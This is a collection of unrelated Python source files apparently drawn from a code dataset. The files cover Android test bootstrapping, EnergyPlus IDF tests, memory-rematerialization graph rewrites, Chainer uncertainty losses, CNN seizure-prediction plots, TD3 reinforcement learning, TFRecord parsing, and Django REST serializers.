Logger.debug('Waiting for device to finish booting (adb shell getprop sys.boot_completed)')
except TimeoutError:
Logger.debug('Timed out while waiting for sys.boot_completed, there might not be a default launcher set, trying to run anyway')
pass
class Bootstrap(object):
_map = {
'no_app': 'https://github.com/EverythingMe/magneto-init/archive/master.zip',
'calc': 'https://github.com/EverythingMe/magneto-demo-calc/archive/master.zip'
}
def __init__(self, name):
if name not in self._map:
raise Exception('{} not recognized'.format(name))
filename, headers = urllib.urlretrieve(self._map[name])
with zipfile.ZipFile(filename) as zip_file:
rootdir = zip_file.namelist()[0]
for member in zip_file.namelist()[1:]:
if not os.path.basename(member):
# create dir from zipfile
os.mkdir(os.path.join(os.path.curdir, member.replace(rootdir, '')))
else:
# copy file (taken from zipfile's extract)
source = zip_file.open(member)
target = file(os.path.join(os.path.curdir, member.replace(rootdir, '')), "wb")
with source, target:
shutil.copyfileobj(source, target)
|
38311
|
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.humidifiers_and_dehumidifiers import HumidifierSteamGas
log = logging.getLogger(__name__)
class TestHumidifierSteamGas(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_humidifiersteamgas(self):
pyidf.validation_level = ValidationLevel.error
obj = HumidifierSteamGas()
# alpha
var_name = "Name"
obj.name = var_name
# object-list
var_availability_schedule_name = "object-list|Availability Schedule Name"
obj.availability_schedule_name = var_availability_schedule_name
# real
var_rated_capacity = 0.0
obj.rated_capacity = var_rated_capacity
# real
var_rated_gas_use_rate = 0.0
obj.rated_gas_use_rate = var_rated_gas_use_rate
# real
var_thermal_efficiency = 0.50005
obj.thermal_efficiency = var_thermal_efficiency
# object-list
var_thermal_efficiency_modifier_curve_name = "object-list|Thermal Efficiency Modifier Curve Name"
obj.thermal_efficiency_modifier_curve_name = var_thermal_efficiency_modifier_curve_name
# real
var_rated_fan_power = 0.0
obj.rated_fan_power = var_rated_fan_power
# real
var_auxiliary_electric_power = 0.0
obj.auxiliary_electric_power = var_auxiliary_electric_power
# node
var_air_inlet_node_name = "node|Air Inlet Node Name"
obj.air_inlet_node_name = var_air_inlet_node_name
# node
var_air_outlet_node_name = "node|Air Outlet Node Name"
obj.air_outlet_node_name = var_air_outlet_node_name
# object-list
var_water_storage_tank_name = "object-list|Water Storage Tank Name"
obj.water_storage_tank_name = var_water_storage_tank_name
# alpha
var_inlet_water_temperature_option = "FixedInletWaterTemperature"
obj.inlet_water_temperature_option = var_inlet_water_temperature_option
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertEqual(idf2.humidifiersteamgass[0].name, var_name)
self.assertEqual(idf2.humidifiersteamgass[0].availability_schedule_name, var_availability_schedule_name)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].rated_capacity, var_rated_capacity)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].rated_gas_use_rate, var_rated_gas_use_rate)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].thermal_efficiency, var_thermal_efficiency)
self.assertEqual(idf2.humidifiersteamgass[0].thermal_efficiency_modifier_curve_name, var_thermal_efficiency_modifier_curve_name)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].rated_fan_power, var_rated_fan_power)
self.assertAlmostEqual(idf2.humidifiersteamgass[0].auxiliary_electric_power, var_auxiliary_electric_power)
self.assertEqual(idf2.humidifiersteamgass[0].air_inlet_node_name, var_air_inlet_node_name)
self.assertEqual(idf2.humidifiersteamgass[0].air_outlet_node_name, var_air_outlet_node_name)
self.assertEqual(idf2.humidifiersteamgass[0].water_storage_tank_name, var_water_storage_tank_name)
self.assertEqual(idf2.humidifiersteamgass[0].inlet_water_temperature_option, var_inlet_water_temperature_option)
|
38351
|
import attr
from attr import attrib, s
from typing import Tuple, List, Optional, Callable, Mapping, Union, Set
from collections import defaultdict
from ..tensor import Operator
@attr.s(auto_attribs=True)
class GOp:
cost : float
size : Tuple[int]
alias : Tuple[int]
args : Tuple['GTensor']
result : Tuple['GTensor']
name : str
meta : dict
def __attrs_post_init__(self):
assert len(self.size) == len(self.alias) == len(self.result)
for i in range(len(self.size)):
assert self.alias[i] == -1 or self.size[i] == 0
def is_aliasing(self) -> bool:
return any([a >= 0 for a in self.alias])
def all_aliasing(self) -> bool:
return all([a >= 0 for a in self.alias])
def is_tuple(self) -> bool:
return len(self.result) > 1
def __str__(self): return self.name
@staticmethod
def make(g : 'Graph',
args : Tuple['GTensor'],
cost : float,
size : Tuple[int],
alias : Tuple[int],
name : str,
res_names : Tuple[str],
meta : dict,
make_uname : bool = True) -> ('GOp', Tuple['GTensor']):
assert len(size) == len(alias) == len(res_names)
uname = '{}/{}'.format(name, g._next_id()) if make_uname else name
result = tuple([GTensor(None, i, res_names[i], None) for i in range(len(res_names))])
op = GOp(cost, size, alias, args, result, uname, meta)
for r in result:
r.op = op
r.storage_size = r.size() if not r.alias() else r.alias().storage_size
assert r.storage_size is not None
g.add_op(op)
return op, result
GOp.CONST_NAME = 'constant'
@attr.s(auto_attribs=True)
class GTensor:
op : 'GOp'
index : int
name : str
storage_size : int
meta : dict = attrib(factory=dict)
def size(self) -> int:
return self.op.size[self.index]
def alias(self) -> Optional['GTensor']:
a = self.op.alias[self.index]
return self.op.args[a] if a >= 0 else None
def __str__(self): return self.name
@attr.s(auto_attribs=True)
class GCompute:
op : 'GOp'
def __str__(self):
return '({},)=Compute({})'.format(
','.join([r.name for r in self.op.result]),
self.op.name
)
@attr.s(auto_attribs=True)
class GGet:
tensor : 'GTensor'
pin : bool
def __str__(self):
op = 'Pin' if self.pin else 'Get'
return '{}({})'.format(op, self.tensor.name)
@attr.s(auto_attribs=True)
class GRelease:
tensor : 'GTensor'
def __str__(self):
return 'Release({})'.format(self.tensor.name)
class Graph:
def __init__(self):
self._id : int = 0
self.schedule : List[Union['GCompute', 'GGet', 'GRelease']] = []
self.ops : Mapping[str, 'GOp'] = {}
self.fwd_ops : Mapping[str, 'GOp'] = {}
self.bwd_ops : Mapping[str, 'GOp'] = {}
self.tensors : Mapping[str, 'GTensor'] = {}
self.op_children : Mapping[str, Set[str]] = defaultdict(set)
self.op_parents : Mapping[str, Set[str]] = defaultdict(set)
self.meta = {
'compute': 0
}
def _next_id(self) -> int:
i = self._id
self._id += 1
return i
def add_op(self, op : 'GOp') -> None:
assert op.name not in self.ops
self.ops[op.name] = op
if op.meta.get('bwd', False):
self.bwd_ops[op.name] = op
else:
self.fwd_ops[op.name] = op
for ti in op.args:
assert ti.name in self.tensors
op_parents = set([ti.op.name for ti in op.args])
for ps in op_parents:
self.op_children[ps].add(op.name)
self.op_parents[op.name] = op_parents
for to in op.result:
assert to.name not in self.tensors
self.tensors[to.name] = to
self.meta['compute'] += op.cost
# returns op names, not ops
def ops_topological(self) -> List[str]:
visited = {v : False for v in self.ops}
stack = []
def visit(v):
visited[v] = True
for u in self.op_children[v]:
if not visited[u]:
visit(u)
stack.insert(0, v)
for v in self.ops:
if not visited[v]:
visit(v)
return stack
def get_closure(self) -> Callable[['Runtime'], None]:
def f(rt):
tensor_map = {}
for cmd in self.schedule:
if isinstance(cmd, GCompute):
# TODO: add a rematerialize cmd? this assumes once-compute only
for x in cmd.op.args:
assert x.name in tensor_map
args = [tensor_map[x.name] for x in cmd.op.args]
rt_op = Operator(
cmd.op.cost,
cmd.op.size,
cmd.op.alias,
cmd.op.name
)
res = rt.compute(args, rt_op, names=tuple([o.name for o in cmd.op.result]))
for i, r in enumerate(res):
assert cmd.op.result[i].name not in tensor_map
tensor_map[cmd.op.result[i].name] = r
elif isinstance(cmd, GGet):
assert cmd.tensor.name in tensor_map
t = tensor_map[cmd.tensor.name]
if cmd.pin:
if not t.defined:
rt.rematerialize(t)
assert t.defined
rt.pin(t)
else:
rt.get(t)
elif isinstance(cmd, GRelease):
assert cmd.tensor.name in tensor_map
rt.release(tensor_map[cmd.tensor.name])
return f
def rewrite_collapse_aliases(g : 'Graph') -> 'Graph':
g_r = Graph()
g_r.meta = g.meta.copy()
g_r.meta['compute'] = 0
ops_topological = g.ops_topological()
# maps old -> new
tensor_map : Mapping[str, 'GTensor'] = {}
op_map : Mapping[str, 'GOp'] = {}
for op_name in ops_topological:
op = g.ops[op_name]
if op.is_aliasing():
if not op.all_aliasing():
raise RuntimeError(
'cannot collapse aliases, {} is not all aliasing'
.format(op)
)
for r in op.result:
tensor_map[r.name] = tensor_map[r.alias().name]
else:
# keep operator
args = [tensor_map[x.name] for x in op.args]
op_new, res = GOp.make(
g_r, args, op.cost, op.size, op.alias,
op.name, tuple([o.name for o in op.result]), op.meta,
make_uname=False
)
for r in res:
tensor_map[r.name] = r
op_map[op.name] = op_new
# rewrite schedule
for cmd in g.schedule:
if isinstance(cmd, GCompute):
if cmd.op.name in op_map:
g_r.schedule.append(GCompute(op_map[cmd.op.name]))
else:
# aliasing op; increase refcount
for r in cmd.op.result:
g_r.schedule.append(GGet(tensor_map[r.name], pin=False))
elif isinstance(cmd, GGet):
g_r.schedule.append(GGet(tensor_map[cmd.tensor.name], pin=cmd.pin))
elif isinstance(cmd, GRelease):
g_r.schedule.append(GRelease(tensor_map[cmd.tensor.name]))
g_r.meta['no_aliases'] = True
g_r.meta['tensor_map'] = {old: new.name for old, new in tensor_map.items()}
g_r.meta['op_map'] = {old: new.name for old, new in op_map.items()}
return g_r
def rewrite_merge_tuples(g : 'Graph') -> 'Graph':
g_r = Graph()
g_r.meta = g.meta.copy()
g_r.meta['compute'] = 0
ops_topological = g.ops_topological()
# maps old -> new
tensor_map : Mapping[str, 'GTensor'] = {}
op_map : Mapping[str, 'GOp'] = {}
for op_name in ops_topological:
op = g.ops[op_name]
assert not op.is_aliasing()
if op.is_tuple():
args = tuple([tensor_map[x.name] for x in op.args])
op_new, res = GOp.make(
g_r, args, op.cost, (sum(op.size),), (-1,),
op.name, ('+'.join([o.name for o in op.result]),), op.meta,
make_uname=False
)
for r in op.result:
tensor_map[r.name] = res[0]
op_map[op.name] = op_new
else:
# keep
args = [tensor_map[x.name] for x in op.args]
op_new, res = GOp.make(
g_r, args, op.cost, op.size, op.alias,
op.name, (op.result[0].name,), op.meta,
make_uname=False
)
tensor_map[res[0].name] = res[0]
op_map[op.name] = op_new
for cmd in g.schedule:
if isinstance(cmd, GCompute):
op_new = op_map[cmd.op.name]
g_r.schedule.append(GCompute(op_new))
# need to get more refs for each missing tuple output
for _ in range(len(cmd.op.result) - 1):
g_r.schedule.append(GGet(op_new.result[0], pin=False))
elif isinstance(cmd, GGet):
g_r.schedule.append(GGet(tensor_map[cmd.tensor.name], pin=cmd.pin))
elif isinstance(cmd, GRelease):
g_r.schedule.append(GRelease(tensor_map[cmd.tensor.name]))
g_r.meta['no_tuples'] = True
g_r.meta['tensor_map'] = {old: new.name for old, new in tensor_map.items()}
g_r.meta['op_map'] = {old: new.name for old, new in op_map.items()}
return g_r
def rewrite_constant_elim(g : 'Graph') -> 'Graph':
if not g.meta.get('no_aliases', False):
raise RuntimeError('cannot eliminate constants, input graph may have aliases')
g_r = Graph()
g_r.meta = g.meta.copy()
compute_pre = g_r.meta['compute']
g_r.meta['compute'] = 0
g_r.meta['constant_ram'] = 0
ops_topological = g.ops_topological()
# maps old -> new
tensor_map : Mapping[str, 'GTensor'] = {}
op_map : Mapping[str, 'GOp'] = {}
for op_name in ops_topological:
op = g.ops[op_name]
if op_name.split('/')[0] == GOp.CONST_NAME:
args = [tensor_map[x.name] for x in op.args]
assert len(args) == 0
g_r.meta['constant_ram'] += sum(op.size)
else:
# keep operator
args = [tensor_map[x.name] for x in op.args if x.name in tensor_map]
op_new, res = GOp.make(
g_r, args, op.cost, op.size, op.alias,
op.name, tuple([o.name for o in op.result]), op.meta,
make_uname=False
)
for r in res:
tensor_map[r.name] = r
op_map[op.name] = op_new
for cmd in g.schedule:
if isinstance(cmd, GCompute):
if cmd.op.name in op_map:
op_new = op_map[cmd.op.name]
g_r.schedule.append(GCompute(op_new))
elif isinstance(cmd, GGet):
if cmd.tensor.name in tensor_map:
g_r.schedule.append(GGet(tensor_map[cmd.tensor.name], pin=cmd.pin))
elif isinstance(cmd, GRelease):
if cmd.tensor.name in tensor_map:
g_r.schedule.append(GRelease(tensor_map[cmd.tensor.name]))
g_r.meta['no_constants'] = True
g_r.meta['tensor_map'] = {old: new.name for old, new in tensor_map.items()}
g_r.meta['op_map'] = {old: new.name for old, new in op_map.items()}
assert compute_pre == g_r.meta['compute']
return g_r
def rewrite_checkmate(g : 'Graph') -> 'Graph':
g_r = rewrite_collapse_aliases(g)
g_r = rewrite_merge_tuples(g_r)
g_r = rewrite_constant_elim(g_r)
return g_r
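# --- Hedged usage sketch (editor addition): builds a two-op graph with one
# constant input and checks that rewrite_checkmate() drops the constant while
# keeping total compute. Run via `python -m <package>.<this_module>` so the
# relative import at the top resolves.
if __name__ == "__main__":
    g = Graph()
    const_op, (x,) = GOp.make(g, (), 0.0, (4,), (-1,), GOp.CONST_NAME, ("x",), {})
    relu_op, (y,) = GOp.make(g, (x,), 1.0, (4,), (-1,), "relu", ("y",), {})
    g.schedule = [GCompute(const_op), GCompute(relu_op), GRelease(x), GRelease(y)]
    g_r = rewrite_checkmate(g)
    print(g_r.ops_topological())       # only the relu op remains
    print(g_r.meta["constant_ram"])    # 4 units of constant storage eliminated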
|
38375
|
import os
from libdotfiles.util import (
HOME_DIR,
PKG_DIR,
REPO_ROOT_DIR,
create_symlink,
run,
)
create_symlink(
PKG_DIR / "launcher.json", HOME_DIR / ".config" / "launcher.json"
)
os.chdir(REPO_ROOT_DIR / "opt" / "launcher")
run(
["python3", "-m", "pip", "install", "--user", "--upgrade", "."],
check=False,
)
|
38403
|
from __future__ import absolute_import
from chainer import backend
from chainer import functions as F
from chainer.functions import sigmoid_cross_entropy
from chainer.functions import softmax_cross_entropy
from .sigmoid_soft_cross_entropy import sigmoid_soft_cross_entropy
def noised_softmax_cross_entropy(y, t, mc_iteration,
normalize=True, cache_score=True, class_weight=None,
ignore_label=-1, reduce='mean', enable_double_backprop=False):
""" Softmax Cross-entropy for aleatoric uncertainty estimates.
See: https://arxiv.org/pdf/1703.04977.pdf
Args:
y (list of ~chainer.Variable): logits and sigma
t (~numpy.ndarray or ~cupy.ndarray): ground-truth
        mc_iteration (int): number of Monte Carlo iterations.
normalize (bool, optional): Defaults to True.
reduce (str, optional): Defaults to 'mean'.
Returns:
[~chainer.Variable]: Loss value.
"""
assert isinstance(y, (list, tuple))
logits, log_std = y
assert logits.shape[0] == log_std.shape[0]
assert log_std.shape[1] in (logits.shape[1], 1)
assert logits.shape[2:] == log_std.shape[2:]
xp = backend.get_array_module(t)
# std = F.sqrt(F.exp(log_var))
std = F.exp(log_std)
loss = 0.
for _ in range(mc_iteration):
noise = std * xp.random.normal(0., 1., std.shape)
loss += softmax_cross_entropy(logits + noise, t,
normalize=False,
cache_score=cache_score,
class_weight=class_weight,
ignore_label=ignore_label,
reduce='no',
enable_double_backprop=enable_double_backprop)
if not reduce == 'mean':
return loss
if normalize:
count = loss.size * mc_iteration
else:
count = max(1, len(loss)) * mc_iteration
return F.sum(loss) / count
def noised_sigmoid_cross_entropy(y, t, mc_iteration, normalize=True, reduce='mean'):
""" Sigmoid Cross-entropy for aleatoric uncertainty estimates.
Args:
y (list of ~chainer.Variable): logits and sigma
t (~numpy.ndarray or ~cupy.ndarray): ground-truth
        mc_iteration (int): number of Monte Carlo iterations.
normalize (bool, optional): Defaults to True.
reduce (str, optional): Defaults to 'mean'.
Returns:
[~chainer.Variable]: Loss value.
"""
assert isinstance(y, (list, tuple))
logits, log_std = y
assert logits.shape[0] == log_std.shape[0]
assert log_std.shape[1] in (logits.shape[1], 1)
assert logits.shape[2:] == log_std.shape[2:]
assert logits.shape == t.shape
xp = backend.get_array_module(t)
# std = F.sqrt(F.exp(log_var))
std = F.exp(log_std)
loss = 0.
for _ in range(mc_iteration):
noise = std * xp.random.normal(0., 1., std.shape)
loss += sigmoid_cross_entropy(logits + noise, t,
normalize=False,
reduce='no')
if not reduce == 'mean':
return loss
if normalize:
count = loss.size * mc_iteration
else:
count = max(1, len(loss)) * mc_iteration
return F.sum(loss) / count
def noised_sigmoid_soft_cross_entropy(y, t, mc_iteration, normalize=True, reduce='mean'):
""" Sigmoid Soft Cross-entropy for aleatoric uncertainty estimates.
Args:
y (list of ~chainer.Variable): logits and sigma
t (~numpy.ndarray or ~cupy.ndarray): ground-truth
        mc_iteration (int): number of Monte Carlo iterations.
normalize (bool, optional): Defaults to True.
reduce (str, optional): Defaults to 'mean'.
Returns:
[~chainer.Variable]: Loss value.
"""
assert isinstance(y, (list, tuple))
logits, log_std = y
assert logits.shape == log_std.shape
assert logits.shape == t.shape
xp = backend.get_array_module(t)
# std = F.sqrt(F.exp(log_var))
std = F.exp(log_std)
loss = 0.
for _ in range(mc_iteration):
noise = std * xp.random.normal(0., 1., std.shape)
loss += sigmoid_soft_cross_entropy(logits + noise, t,
normalize=False,
reduce='no')
if not reduce == 'mean':
return loss
if normalize:
count = loss.size * mc_iteration
else:
count = max(1, len(loss)) * mc_iteration
return F.sum(loss) / count
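# --- Hedged usage sketch (editor addition; shapes, dtypes and the number of
# Monte Carlo draws are assumptions, not values from the original code) ---
if __name__ == "__main__":
    import numpy as np
    logits = np.random.randn(4, 3).astype(np.float32)    # (batch, classes)
    log_std = np.zeros((4, 1), dtype=np.float32)          # one shared noise scale per sample
    labels = np.random.randint(0, 2, size=(4, 3)).astype(np.int32)
    loss = noised_sigmoid_cross_entropy([logits, log_std], labels, mc_iteration=10)
    print(loss)   # scalar chainer.Variable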
|
38430
|
import numpy as np
import json
import cPickle
import matplotlib.pyplot as plt
from theano import config
import matplotlib.cm as cmx
import matplotlib.colors as colors
from sklearn.metrics import roc_curve
from utils.loader import load_train_data
from utils.config_name_creator import *
from utils.data_scaler import scale_across_features, scale_across_time
from cnn.conv_net import ConvNet
config.floatX = 'float32'
def get_cmap(N):
color_norm = colors.Normalize(vmin=0, vmax=N - 1)
scalar_map = cmx.ScalarMappable(norm=color_norm, cmap='hsv')
def map_index_to_rgb_color(index):
return scalar_map.to_rgba(index)
return map_index_to_rgb_color
def plot_train_probs(subject, data_path, model_path):
with open(model_path + '/' + subject + '.pickle', 'rb') as f:
state_dict = cPickle.load(f)
cnn = ConvNet(state_dict['params'])
cnn.set_weights(state_dict['weights'])
scalers = state_dict['scalers']
d = load_train_data(data_path, subject)
x, y = d['x'], d['y']
x, _ = scale_across_time(x, x_test=None, scalers=scalers) if state_dict['params']['scale_time'] \
else scale_across_features(x, x_test=None, scalers=scalers)
cnn.batch_size.set_value(x.shape[0])
probs = cnn.get_test_proba(x)
fpr, tpr, threshold = roc_curve(y, probs)
c = np.sqrt((1-tpr)**2+fpr**2)
opt_threshold = threshold[np.where(c==np.min(c))[0]]
print opt_threshold
x_coords = np.zeros(len(y), dtype='float64')
rng = np.random.RandomState(42)
x_coords += rng.normal(0.0, 0.08, size=len(x_coords))
plt.scatter(x_coords, probs, c=y, s=60)
plt.title(subject)
plt.show()
if __name__ == '__main__':
with open('SETTINGS.json') as f:
settings_dict = json.load(f)
data_path = settings_dict['path']['processed_data_path'] + '/' + create_fft_data_name(settings_dict)
model_path = settings_dict['path']['model_path'] + '/' + create_cnn_model_name(settings_dict)
subjects = ['Patient_1', 'Patient_2', 'Dog_1', 'Dog_2', 'Dog_3', 'Dog_4', 'Dog_5']
for subject in subjects:
print '***********************', subject, '***************************'
plot_train_probs(subject, data_path, model_path)
|
38460
|
from pywizard.userSettings import settings
import scipy as sp
class PreEmphasizer(object):
@classmethod
def processBuffer(cls, buf):
preEnergy = buf.energy()
alpha = cls.alpha()
unmodifiedPreviousSample = buf.samples[0]
tempSample = None
first_sample = buf.samples[0]
buf.samples = buf.samples[1:] + (buf.samples[:-1] * alpha)
buf.samples = sp.insert(buf.samples, 0, first_sample)
cls.scaleBuffer(buf, preEnergy, buf.energy())
@classmethod
def alpha(cls):
return settings.preEmphasisAlpha
@classmethod
def scaleBuffer(cls, buf, preEnergy, postEnergy):
scale = sp.sqrt(preEnergy / postEnergy)
buf.samples *= scale
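# --- Hedged usage sketch (editor addition; `_ToyBuffer` is a stand-in for the
# real pywizard buffer type, which exposes .samples and .energy(), and the
# pre-emphasis alpha comes from pywizard's user settings) ---
if __name__ == "__main__":
    class _ToyBuffer(object):
        def __init__(self, samples):
            self.samples = sp.array(samples, dtype=float)

        def energy(self):
            return float((self.samples ** 2).sum())

    buf = _ToyBuffer([0.1, 0.4, 0.35, 0.2])
    PreEmphasizer.processBuffer(buf)
    print(buf.samples)   # pre-emphasized samples, rescaled to the original energy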
|
38490
|
import torch
import torch.nn.functional as F
from agent.td3 import TD3
class TD3MT(TD3):
def __init__(self,
state_dim,
action_dim,
max_action,
num_env,
discount=0.99,
tau=0.005,
policy_noise=0.2,
noise_clip=0.5,
policy_freq=2,
cuda_index=None
):
super().__init__(state_dim, action_dim, max_action,
discount, tau,
policy_noise, noise_clip,
policy_freq, cuda_index)
self.it = 0
self.total_it = [0 for _ in range(num_env)]
self.state_dim = state_dim
self.action_dim = action_dim
self.actor_optimizer_online = torch.optim.Adam(self.actor.parameters(), lr=3e-4)
self.critic_optimizer_online = torch.optim.Adam(self.critic.parameters(), lr=3e-4)
def save(self, filename):
super().save(filename)
torch.save(self.actor_optimizer_online.state_dict(), filename + "_actor_optimizer_online.pt")
torch.save(self.critic_optimizer_online.state_dict(), filename + "_critic_optimizer_online.pt")
def load(self, filename):
super().load(filename)
self.actor_optimizer_online.load_state_dict(torch.load(filename + "_actor_optimizer_online.pt"))
self.critic_optimizer_online.load_state_dict(torch.load(filename + "_critic_optimizer_online.pt"))
def pad_state(self, state):
return torch.cat([state,
torch.zeros(state.shape[0], self.state_dim - state.shape[1]).to(self.device)],
dim=1)
def pad_action(self, action):
return torch.cat([action,
torch.zeros(action.shape[0], self.action_dim - action.shape[1]).to(self.device)],
dim=1)
def train_mt(self, idx, teacher, replay, batch_size=100, is_offline=True):
self.total_it[idx] += 1
state, action, next_state, reward, not_done = replay.sample(batch_size)
state_dim_org = state.shape[1]
action_dim_org = action.shape[1]
with torch.no_grad():
state_pad = self.pad_state(state)
action_pad = self.pad_action(action)
if is_offline:
teacher_q1, teacher_q2 = teacher.critic(state, action)
else:
next_state_pad = self.pad_state(next_state)
next_action = self.actor_target(next_state_pad)
                noise = (
                    torch.randn_like(next_action) * self.policy_noise
                ).clamp(-self.noise_clip, self.noise_clip)
next_action = (next_action + noise).clamp(-self.max_action, self.max_action)
next_action = next_action[:, :action_dim_org]
next_action_pad = self.pad_action(next_action)
target_q1, target_q2 = self.critic_target(next_state_pad, next_action_pad)
target_q = torch.min(target_q1, target_q2)
target_q = reward + not_done * self.discount * target_q
current_q1, current_q2 = self.critic(state_pad, action_pad)
if is_offline:
critic_loss = F.mse_loss(current_q1, teacher_q1) + F.mse_loss(current_q2, teacher_q2)
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
else:
critic_loss = F.mse_loss(current_q1, target_q) + F.mse_loss(current_q2, target_q)
self.critic_optimizer_online.zero_grad()
critic_loss.backward()
self.critic_optimizer_online.step()
loss = [None, critic_loss.cpu().data.numpy()]
if is_offline or self.total_it[idx] % self.policy_freq == 0:
current_action = self.actor(state_pad)[:, :action_dim_org]
current_action_pad = self.pad_action(current_action)
actor_loss_t = -teacher.critic.Q1(state, current_action)
if is_offline:
actor_loss = actor_loss_t.mean()
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
else:
actor_loss = -self.critic.Q1(state_pad, current_action_pad)
actor_loss = 1.0 * actor_loss + 1.0 * actor_loss_t
actor_loss = actor_loss.mean()
self.actor_optimizer_online.zero_grad()
actor_loss.backward()
self.actor_optimizer_online.step()
self.update_target_network()
loss[0] = actor_loss.cpu().data.numpy()
return loss
|
38494
|
import tensorflow as tf
def get_record_parser_qqp(config, is_test=False):
def parse(example):
ques_limit = config.test_ques_limit if is_test else config.ques_limit
features = tf.parse_single_example(example,
features={
"ques1_idxs": tf.FixedLenFeature([], tf.string),
"ques2_idxs": tf.FixedLenFeature([], tf.string),
"label": tf.FixedLenFeature([], tf.string),
"id": tf.FixedLenFeature([], tf.int64)
})
ques1_idxs = tf.reshape(tf.decode_raw(
features["ques1_idxs"], tf.int32), [ques_limit + 2])
ques2_idxs = tf.reshape(tf.decode_raw(
features["ques2_idxs"], tf.int32), [ques_limit + 2])
label = tf.reshape(tf.decode_raw(
features["label"], tf.float32), [2])
qa_id = features["id"]
return ques1_idxs, ques2_idxs, label, qa_id
return parse
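# --- Hedged usage sketch (editor addition; the TFRecord path and the fields of
# `config` are assumptions) ---
# parser = get_record_parser_qqp(config)
# dataset = tf.data.TFRecordDataset("train.tfrecords").map(parser).batch(32)
# ques1, ques2, label, qa_id = dataset.make_one_shot_iterator().get_next()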
|
38544
|
from rest_framework import serializers
from projects.models import (
Project,
ProjectVolunteers,
ProjectVolunteersRegistration,
ProjectAttendees,
ProjectAttendeesRegistration,
ProjectDiscussion,
ProjectAnswerDiscussion,
ProjectHub,
)
class ProjectVolunteersRegistrationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProjectVolunteersRegistration
fields = ('url', 'profile', 'project_volunteers', 'project_volunteers_ref')
def create(self, validated_data):
project_volunteers = ProjectVolunteers.objects.get(pk=validated_data['project_volunteers_ref'])
registration = ProjectVolunteersRegistration.objects.create(
project_volunteers=project_volunteers,
**validated_data
)
count = ProjectVolunteersRegistration.objects.filter(
project_volunteers=project_volunteers
).count()
project_volunteers.registered = count
project_volunteers.save()
return registration
class ProjectVolunteersSerializer(serializers.HyperlinkedModelSerializer):
volunteers_registration = ProjectVolunteersRegistrationSerializer(many=True, read_only=True)
class Meta:
model = ProjectVolunteers
fields = (
'url',
'id',
'project',
'role',
'description',
'seats',
'registered',
'minimum_registration',
'volunteers_registration',
)
read_only_fields = ('registered', 'project', 'id')
class ProjectAttendeesRegistrationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProjectAttendeesRegistration
fields = ('url', 'profile', 'project_attendees', 'project_attendees_ref')
def create(self, validated_data):
project_attendees = ProjectAttendees.objects.get(pk=validated_data['project_attendees_ref'])
registration = ProjectAttendeesRegistration.objects.create(project_attendees=project_attendees, **validated_data)
count = ProjectAttendeesRegistration.objects.filter(project_attendees=project_attendees).count()
project_attendees.registered = count
project_attendees.save()
return registration
class ProjectAttendeesSerializer(serializers.HyperlinkedModelSerializer):
attendees_registration = ProjectAttendeesRegistrationSerializer(many=True, read_only=True)
class Meta:
model = ProjectAttendees
fields = (
'url',
'id',
'project',
'seats',
'registered',
'attendees_registration',
'minimum_registration',
)
read_only_fields = ('registered', 'project',)
class ProjectAnswerDiscussionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = ProjectAnswerDiscussion
fields = ('url', 'id', 'discussion_ref', 'discussion', 'text', 'profile', 'created', 'updated')
read_only_fields = ('discussion', 'profile')
def create(self, validated_data):
project_discussion = ProjectDiscussion.objects.get(pk=validated_data['discussion_ref'])
answer = ProjectAnswerDiscussion.objects.create(discussion=project_discussion, **validated_data)
return answer
class ProjectDiscussionSerializer(serializers.HyperlinkedModelSerializer):
answer_discussion_project = ProjectAnswerDiscussionSerializer(many=True, read_only=True)
class Meta:
model = ProjectDiscussion
fields = (
'url',
'id',
'project',
'project_ref',
'title',
'text',
'profile',
'created',
'updated',
'answer_discussion_project',
)
read_only_fields = ('profile', 'project', 'id')
def create(self, validated_data):
project = Project.objects.get(pk=validated_data['project_ref'])
new_discussion = ProjectDiscussion.objects.create(project=project, **validated_data)
return new_discussion
class ProjectSerializer(serializers.HyperlinkedModelSerializer):
attendees = ProjectAttendeesSerializer()
volunteers = ProjectVolunteersSerializer(many=True)
discussion_project = ProjectDiscussionSerializer(many=True, read_only=True)
    # Note: declaring this as a HyperlinkedRelatedField(many=True,
    # view_name='discussion_project', read_only=True) caused an error here,
    # so the nested ProjectDiscussionSerializer above is used instead.
class Meta:
model = Project
fields = ('url', 'id', 'name', 'start',
'end', 'description', 'category',
'sub_category', 'oth_category', 'oth_sub_cat','place_name', 'number', 'street',
'postal_code', 'city', 'organizer', 'created',
'updated', 'project_type', 'attendees',
'volunteers', 'discussion_project')
read_only_fields = ('organizer', 'id')
def create(self, validated_data):
attendees_data = validated_data.pop('attendees')
volunteers_data = validated_data.pop('volunteers')
new_project = Project.objects.create(**validated_data)
if validated_data['project_type'] == 'CO':
ProjectAttendees.objects.create(project=new_project, **attendees_data)
elif validated_data['project_type'] == 'CP':
for volunteer_data in volunteers_data:
ProjectVolunteers.objects.create(project=new_project, **volunteer_data)
else:
ProjectAttendees.objects.create(project=new_project, **attendees_data)
for volunteer_data in volunteers_data:
ProjectVolunteers.objects.create(project=new_project, **volunteer_data)
return new_project
class ProjectShortSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Project
fields = ('url', 'id', 'name', 'start', 'created', 'updated',)
class ProjectHubSerializer(serializers.HyperlinkedModelSerializer):
project = ProjectSerializer()
class Meta:
model = ProjectHub
fields = ('project', 'distance_km', 'lat', 'lng')
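# Sketch (assumption): these serializers are normally exposed through ViewSets
# and a router defined elsewhere (views.py / urls.py); the wiring below is
# illustrative only and not part of this module.
#
#   class ProjectViewSet(viewsets.ModelViewSet):
#       queryset = Project.objects.all()
#       serializer_class = ProjectSerializer
#
#   router.register(r'projects', ProjectViewSet)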
|
38561
|
import itertools
from typing import Any, Callable, Sequence, Tuple
import dill as pickle
import jax.numpy as np
import numpy as onp
import pandas as pd
